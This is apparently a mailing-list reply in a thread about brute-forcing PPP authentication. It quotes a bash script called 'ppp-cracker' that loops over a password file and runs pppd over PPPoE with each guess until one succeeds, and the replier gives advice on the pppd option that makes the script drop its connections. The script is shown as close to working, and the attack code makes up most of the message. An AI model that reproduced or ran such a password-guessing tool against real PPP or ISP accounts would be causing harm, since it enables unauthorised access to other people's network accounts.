Re: PPP authentication brute-force attack?



Matheus Michels wrote:

This is exactly what I wanted. I made this little script based on yours:

#!/bin/bash

SETSID=/usr/bin/setsid
PPPD=/usr/sbin/pppd
PPPOE=/usr/sbin/pppoe

PPPD_OPTIONS="noipdefault noauth default-asyncmap defaultroute hide-password nodetach usepeerdns mtu 1492 mru 1492 noaccomp noccp nobsdcomp nodeflate nopcomp novj novjccomp lcp-echo-interval 30 lcp-echo-failure 3 pap-max-authreq 2 pap-restart 3 maxconnect 5"
PPPOE_OPTIONS="-I eth0"

PASSWORDS=/home/matheus/pass.txt

if test "$1" = "" ; then
echo "$0: Usage: ppp-cracker user">& 2
exit 1
fi

while read passwd; do
$SETSID $PPPD pty "$PPPOE $PPPOE_OPTIONS" $PPPD_OPTIONS user "$1" password "$passwd"
if [ $? -eq 0 ]; then
echo "Found password: $passwd"
break
fi
done < $PASSWORDS


I've copied some parts from the adsl-start and adsl-connect scripts. Actually, the script
> is not functional yet. It authenticates and, some seconds later, exits with an input/output error.
> But I'm doing some changes based on the scripts shipped with RP-PPPOE and I'm almost getting the
> script to work.

We are setting maxconnect to 5 seconds, so our pppd closes the connection. If you don't want that, don't use the maxconnect parameter.

--
Zsolt

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------



Relevant Pages

  • Re: speed of script execution
    ... the execution of the following scripts. ... Of course "don't use the curly braces" but this is part of a larger ...
    (comp.protocols.kermit.misc)
  • RE: /etc/init.d/ - add/remove services
    ... leave the links alone and just manipulate the scripts ... the "no" in the filename whereas with the "exit" you'd have to look in the ... control over the runlevels. ...
    (Debian-User)
  • The best scripts ever (trick or treat)
    ... POST YOUR COOLEST SCRIPTS! ... prints an optional argument to stderr and exits. ... # but may not exit with a code other than 0. ...
    (freebsd-questions)
  • Re: exit codes of background processes
    ... sleep 4 & ... scripts running in the background. ... scripts in the background and collecting their exit codes so that it ...
    (comp.unix.shell)
  • Re: How to shrink image files?
    ... I use the netpbm tools and some helper scripts, ... sub usage { ... my $exit = shift; ...
    (comp.os.linux.misc)